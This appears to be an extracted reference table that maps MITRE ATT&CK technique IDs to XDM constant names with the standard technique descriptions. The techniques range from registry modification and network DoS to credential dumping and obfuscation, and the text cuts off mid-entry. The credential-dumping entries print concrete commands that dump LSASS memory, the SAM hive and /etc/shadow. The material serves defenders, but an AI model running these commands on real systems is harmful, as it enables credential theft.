T1578.004 XDM_CONST.MITRE_TECHNIQUE_MODIFY_CLOUD_COMPUTE_INFRASTRUCTURE_REVERT_CLOUD_INSTANCE An adversary may revert changes made to a cloud instance after they have performed malicious activities
in attempt to evade detection and remove evidence of their presence. In highly virtualized environments,
such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data
storage snapshots through the cloud management dashboard or cloud APIs. Another variation of this
technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide
various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset
upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore
Cloud Snapshot) https://attack.mitre.org/techniques/T1578/004

T1112 XDM_CONST.MITRE_TECHNIQUE_MODIFY_REGISTRY Adversaries may interact with the Windows Registry to hide configuration information within Registry keys,
remove information as part of cleaning up, or as part of other techniques to aid in persistence and
execution. Access to specific areas of the Registry depends on account permissions, some requiring
administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/
software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other
tools may also be used, such as a remote access tool, which may contain functionality to interact with the
Registry through the Windows API. Registry modifications may also include actions to hide keys, such as
prepending key names with a null character, which will cause an error and/or be ignored when read via
[Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft
Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands
used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding
Reg Jul 2017) The Registry of a remote system may be modified to aid in execution of files as part of lateral
movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft
Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access
to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for
RPC communication. https://attack.mitre.org/techniques/T1112

T1601 XDM_CONST.MITRE_TECHNIQUE_MODIFY_SYSTEM_IMAGE Adversaries may make changes to the operating system of embedded network devices to weaken
defenses and provide new capabilities for themselves. On such devices, the operating systems are typically
monolithic and most of the device functionality and capabilities are contained within a single file. To change
the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This
can either be done live in memory during system runtime for immediate effect, or in storage to implement
the change on the next boot of the network device. https://attack.mitre.org/techniques/T1601

T1601.002 XDM_CONST.MITRE_TECHNIQUE_MODIFY_SYSTEM_IMAGE_DOWNGRADE_SYSTEM_IMAGE Adversaries may install an older version of the operating system of a network device to weaken security.
Older operating system versions on network devices often have weaker encryption ciphers and, in general,
fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution) On embedded devices,
downgrading the version typically only requires replacing the operating system file in storage. With most
embedded devices, this can be achieved by downloading a copy of the desired version of the operating
system file and reconfiguring the device to boot from that file on next system restart. The adversary could
then restart the device to implement the change immediately or they could wait until the next time the
system restarts. Downgrading the system image to an older versions may allow an adversary to evade
defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).
Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch
System Image](https://attack.mitre.org/techniques/T1601/001). https://attack.mitre.org/techniques/
T1601/002
Original Mapped Description

T1601.001 XDM_CONST.MITRE_TECHNIQUE_MODIFY_SYSTEM_IMAGE_PATCH_SYSTEM_IMAGE Adversaries may modify the operating system of a network device to introduce new capabilities or weaken
existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth)
(Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen
of the Dead) Some network devices are built with a monolithic architecture, where the entire operating
system and most of the functionality of the device is contained within a single file. Adversaries may change
this file in storage, to be loaded in a future boot, or in memory during runtime. To change the operating
system in storage, the adversary will typically use the standard procedures available to device operators.
This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP,
SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of
it and the device reconfigured to boot to the compromised image. To change the operating system in
memory, the adversary typically can use one of two methods. In the first, the adversary would make use of
native debug commands in the original, unaltered running operating system that allow them to directly
modify the relevant memory addresses containing the running operating system. This method typically
requires administrative level access to the device. In the second method for changing the operating system
in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software
that loads when the device starts that, in turn, will launch the operating system. Adversaries may use
malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://
attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in
memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the
adversary, allowing them to patch the live operating system during runtime. By modifying the instructions
stored in the system image file, adversaries may either weaken existing defenses or provision new
capabilities that the device did not have before. Examples of existing defenses that can be impeded include
encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network
Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via
[Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the
adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy]
(https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/
T1205/001). Adversaries may also compromise existing commands in the operating system to produce
false output to mislead defenders. When this method is used in conjunction with [Downgrade System
Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command
may include changing the output of the command that shows the version of the currently running operating
system. By patching the operating system, the adversary can change this command to instead display the
original, higher revision number that they replaced through the system downgrade. When the operating
system is patched in storage, this can be achieved in either the resident storage (typically a form of flash
memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). When the
technique is performed on the running operating system in memory and not on the stored copy, this
technique will not survive across reboots. However, live memory modification of the operating system can
be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence.
https://attack.mitre.org/techniques/T1601/001

T1104 XDM_CONST.MITRE_TECHNIQUE_MULTI_STAGE_CHANNELS Adversaries may create multiple stages for command and control that are employed under different
conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel
to make detection more difficult. Remote access tools will call back to the first-stage command and control
server for instructions. The first stage may have automated capabilities to collect basic host information,
update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that
point to redirect the host to the second-stage command and control server. The second stage will likely be
more fully featured and allow the adversary to interact with the system through a reverse shell and
additional RAT features. The different stages will likely be hosted separately with no overlapping
infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://
attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and
blocked. https://attack.mitre.org/techniques/T1104

T1106 XDM_CONST.MITRE_TECHNIQUE_NATIVE_API Adversaries may interact with the native OS application programming interface (API) to execute behaviors.
Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those
involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel
API) These native APIs are leveraged by the OS during system boot (when other system components are
not yet initialized) as well as carrying out tasks and requests during routine operations. Native API functions
(such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are
also often exposed to user-mode applications via interfaces and libraries. (Citation: OutFlank System Calls)
(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the
Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.
(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run
a CLI command, load modules, etc. as thousands of similar API functions exist for various system
operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) Higher level software frameworks,
such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These
frameworks typically provide language wrappers/abstractions to API functionalities and are designed for
ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS
Cocoa)(Citation: macOS Foundation) Adversaries may abuse these OS API functions as a means of
executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/
T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize
various components of a victimized system. While invoking API functions, adversaries may also attempt to
bypass defensive tools (ex: unhooking monitored functions via [Disable or Modify Tools](https://
attack.mitre.org/techniques/T1562/001)). https://attack.mitre.org/techniques/T1106

T1599 XDM_CONST.MITRE_TECHNIQUE_NETWORK_BOUNDARY_BRIDGING Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these
devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted
and untrusted networks. Devices such as routers and firewalls can be used to create boundaries between
trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy
in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by
prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.
To participate with the rest of the network, these devices can be directly addressable or transparent, but
their mode of operation has no bearing on how the adversary can bypass them when compromised. When
an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass
normally prohibited traffic across the trust boundary between the two separated networks without
hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow
the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-
hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication]
(https://attack.mitre.org/techniques/T1020/001). In the cases where a border device separates two separate
organizations, the adversary can also facilitate lateral movement into new victim environments. https://
attack.mitre.org/techniques/T1599

T1599.001 XDM_CONST.MITRE_TECHNIQUE_NETWORK_BOUNDARY_BRIDGING_NETWORK_ADDRESS_TRANSLATION_TRAVERSAL Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation
(NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on
traffic routing that otherwise separate trusted and untrusted networks. Network devices such as routers and
firewalls that connect multiple networks together may implement NAT during the process of passing
packets between networks. When performing NAT, the network device will rewrite the source and/or
destination addresses of the IP address header. Some network designs require NAT for the packets to
cross the border device. A typical example of this is environments where internal networks make use of
non-Internet routable addresses.(Citation: RFC1918) When an adversary gains control of a network
boundary device, they can either leverage existing NAT configurations to send traffic between two
separated networks, or they can implement NAT configurations of their own design. In the case of network
designs that require NAT to function, this enables the adversary to overcome inherent routing limitations
that would normally prevent them from accessing protected systems behind the border device. In the case
of network designs that do not require NAT, address translation can be used by adversaries to obscure their
activities, as changing the addresses of packets that traverse a network boundary device can make
monitoring data transmissions more challenging for defenders. Adversaries may use [Patch System Image]
(https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device,
implementing their own custom NAT mechanisms to further obscure their activities https://attack.mitre.org/
techniques/T1599/001
Original Mapped Description

T1498 XDM_CONST.MITRE_TECHNIQUE_NETWORK_DENIAL_OF_SERVICE Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of
targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services
rely on. Example resources include specific websites, email services, DNS, and web-based applications.
Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye
OpPoisonedHandover February 2016) and to support other malicious activities, including
distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec
DDoS October 2014) A Network DoS will occur when the bandwidth capacity of the network connection to a
system is exhausted due to the volume of malicious traffic directed at the resource or the network
connections and network devices the resource relies on. For example, an adversary may send 10Gbps of
traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be
generated by a single system or multiple systems spread across the internet, which is commonly referred to
as a distributed DoS (DDoS). To perform Network DoS attacks several aspects apply to multiple methods,
including IP address spoofing, and botnets. Adversaries may use the original IP address of an attacking
system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking
system or to enable reflection. This can increase the difficulty defenders have in defending against the
attack by reducing or eliminating the effectiveness of filtering by the source address on network defense
devices. For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://
attack.mitre.org/techniques/T1499). https://attack.mitre.org/techniques/T1498

T1498.001 XDM_CONST.MITRE_TECHNIQUE_NETWORK_DENIAL_OF_SERVICE_DIRECT_NETWORK_FLOOD Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network
traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or
more systems are used to send a high-volume of network packets towards the targeted service's network.
Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are
commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to
conduct network flooding attacks against networks and services. Large botnets can generate a significant
amount of traffic from systems spread across the global Internet. Adversaries may have the resources to
build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an
attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the
flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate
the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes
exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such
as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March
2016) https://attack.mitre.org/techniques/T1498/001

T1498.002 XDM_CONST.MITRE_TECHNIQUE_NETWORK_DENIAL_OF_SERVICE_REFLECTION_AMPLIFICATION Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a
target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will
respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An
adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the
victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a
botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation:
Cloudflare ReflectionDoS May 2017) Reflection attacks often take advantage of protocols with larger
responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification
attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of
magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon
many variables, such as the protocol in question, the technique used, and the amplifying servers that
actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection
Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare
NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor
AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol,
with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb
2018) https://attack.mitre.org/techniques/T1498/002

T1046 XDM_CONST.MITRE_TECHNIQUE_NETWORK_SERVICE_SCANNING Adversaries may attempt to get a listing of services running on remote hosts, including those that may be
vulnerable to remote software exploitation. Methods to acquire this information include port scans and
vulnerability scans using tools that are brought onto a system. Within cloud environments, adversaries may
attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is
connected to a on-premises environment, adversaries may be able to identify services running on non-
cloud systems as well. https://attack.mitre.org/techniques/T1046

T1135 XDM_CONST.MITRE_TECHNIQUE_NETWORK_SHARE_DISCOVERY Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of
information to gather as a precursor for Collection and to identify potential systems of interest for Lateral
Movement. Networks often contain shared network drives and folders that enable users to access file
directories on various systems across a network. File sharing over a Windows network occurs over the
SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://
attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using
the net view \\\\remotesystem command. It can also be used to query shared drives on the local
system using net share. For macOS, the sharing -l command lists all shared points used for smb
services. https://attack.mitre.org/techniques/T1135

T1040 XDM_CONST.MITRE_TECHNIQUE_NETWORK_SNIFFING Adversaries may sniff network traffic to capture information about an environment, including authentication
material passed over the network. Network sniffing refers to using the network interface on a system to
monitor or capture information sent over a wired or wireless connection. An adversary may place a network
interface into promiscuous mode to passively access data in transit over the network, or use span ports to
capture a larger amount of data. Data captured via this technique may include user credentials, especially
those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such
as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be
used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may also reveal configuration details, such as running services, version numbers, and
other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral
Movement and/or Defense Evasion activities. https://attack.mitre.org/techniques/T1040

T1095 XDM_CONST.MITRE_TECHNIQUE_NON_APPLICATION_LAYER_PROTOCOL Adversaries may use a non-application layer protocol for communication between host and C2 server or
among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI)
Specific examples include use of network layer protocols, such as the Internet Control Message Protocol
(ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such
as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because
ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts;
(Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as
TCP or UDP and may be used by adversaries to hide communications. https://attack.mitre.org/techniques/
T1095

T1571 XDM_CONST.MITRE_TECHNIQUE_NON_STANDARD_PORT Adversaries may communicate using a protocol and port paring that are typically not associated. For
example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent
Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard
port used by a protocol to bypass filtering or muddle analysis/parsing of network data. https://
attack.mitre.org/techniques/T1571

T1003 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING Adversaries may attempt to dump credentials to obtain account login and credential material, normally in
the form of a hash or a clear text password, from the operating system and software. Credentials can then
be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted
information. Several of the tools mentioned in associated sub-techniques may be used by both adversaries
and professional security testers. Additional custom tools likely exist as well. https://attack.mitre.org/
techniques/T1003

T1003.008 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_PASSWD_AND_SHADOW Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline
password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/
shadow to store user account information including password hashes in /etc/shadow. By default, /etc/
shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats) The Linux
utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities
such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /
etc/shadow > /tmp/crack.password.db https://attack.mitre.org/techniques/T1003/008
Original Mapped Description

T1003.005 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_CACHED_DOMAIN_CREDENTIALS Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the
event a domain controller is unavailable.(Citation: Microsoft - Cached Creds) On Windows Vista and newer,
the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.
(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per
system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking]
(https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg]
(https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached
credentials. Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib
mscache) https://attack.mitre.org/techniques/T1003/005

T1003.006 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_DCSYNC Adversaries may attempt to access credentials and other sensitive information by abusing a Windows
Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation:
Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the
replication process from a remote domain controller using a technique called DCSync. Members of the
Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain
controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active
Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT
and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/
techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation:
Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation]
(https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017) DCSync
functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/
S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs
DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017) https://attack.mitre.org/
techniques/T1003/006

T1003.004 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_LSA_SECRETS Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets,
which can contain a variety of different credential materials, such as credentials for service accounts.
(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows
Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets.
LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets) [Reg](https://
attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://
attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA
Secrets) https://attack.mitre.org/techniques/T1003/004

T1003.001 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_LSASS_MEMORY Adversaries may attempt to access credential material stored in the process memory of the Local Security
Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of
credential materials in LSASS process memory. These credential materials can be harvested by an
administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/
TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550). As well
as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed
on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe
lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp *
sekurlsa::logonPasswords Built-in Windows tools such as comsvcs.dll can also be used: *
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity
Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector) Windows
Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into
the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as
any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry
keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may
modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when
the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) The following SSPs can
be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done
through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use
with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.
(Citation: TechNet Blogs Credential Protection) * Kerberos: Preferred for mutual client-server domain
authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for
Remote Desktop Services.(Citation: TechNet Blogs Credential Protection) https://attack.mitre.org/
techniques/T1003/001

T1003.003 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_NTDS Adversaries may attempt to access or create a copy of the Active Directory domain database in order to
steal credential information, as well as obtain other information about domain members such as devices,
users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit
of a domain controller.(Citation: Wikipedia Active Directory) In addition to looking for NTDS files on active
Domain Controllers, attackers may search for backups that contain the same or similar information.
(Citation: Metcalf 2015) The following tools and techniques can be used to enumerate the NTDS file and
the contents of the entire Active Directory hashes. * Volume Shadow Copy * secretsdump.py * Using the in-
built Windows tool, ntdsutil.exe * Invoke-NinjaCopy https://attack.mitre.org/techniques/T1003/003

T1003.007 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_PROC_FILESYSTEM Adversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc
filesystem on Linux contains a great deal of information regarding the state of the running operating system.
Processes running with root privileges can use this facility to scrape live memory of other running
programs. If any of these programs store passwords in clear text or password hashes in memory, these
values can then be harvested for either usage or brute force attacks, respectively. This functionality has
been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool
inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for
text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use
memory to store such authentication artifacts. https://attack.mitre.org/techniques/T1003/007

T1003.002 XDM_CONST.MITRE_TECHNIQUE_OS_CREDENTIAL_DUMPING_SECURITY_ACCOUNT_MANAGER Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database
either through in-memory techniques or through the Windows Registry where the SAM database is stored.
The SAM is a database file that contains local accounts for the host, typically those found with the net
user command. Enumerating the SAM database requires SYSTEM level access. A number of tools can be
used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * [gsecdump](https://
attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg: * reg save HKLM\sam sam * reg
save HKLM\system system Creddump7 can then be used to process the SAM database locally to retrieve
hashes.(Citation: GitHub Creddump7) Notes: * RID 500 account is the local, built-in administrator. * RID
501 is the guest account. * User accounts start with a RID of 1,000+. https://attack.mitre.org/techniques/
T1003/002

T1027 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting,
encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that
can be used across different platforms and the network to evade defenses. Payloads may be compressed,
archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or
later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode
Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/
techniques/T1204). The user may also be required to input a password to open a password protected
compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November
2016) Adversaries may also used compressed or archived scripts, such as JavaScript. Portions of files can
also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation:
Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign
files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept
2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and
Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters,
and other platform/language specific semantics can be used to evade signature based detections and
application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-
Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) https://attack.mitre.org/
techniques/T1027
Original Mapped Description

T1027.001 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION_BINARY_PADDING Adversaries may use binary padding to add junk data and change the on-disk representation of malware.
This can be done without affecting the functionality or behavior of a binary, but can increase the size of the
binary beyond what some security tools are capable of handling due to file size limitations. Binary padding
effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static
anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function
to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist
Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and
detection capabilities that are not designed or configured to scan large files. This may also reduce the
likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the
maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) https://attack.mitre.org/
techniques/T1027/001

T1027.004 XDM_CONST.MITRE_TECHNIQUE_OBFUSCATED_FILES_OR_INFORMATION_COMPILE_AFTER_DELIVERY Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as
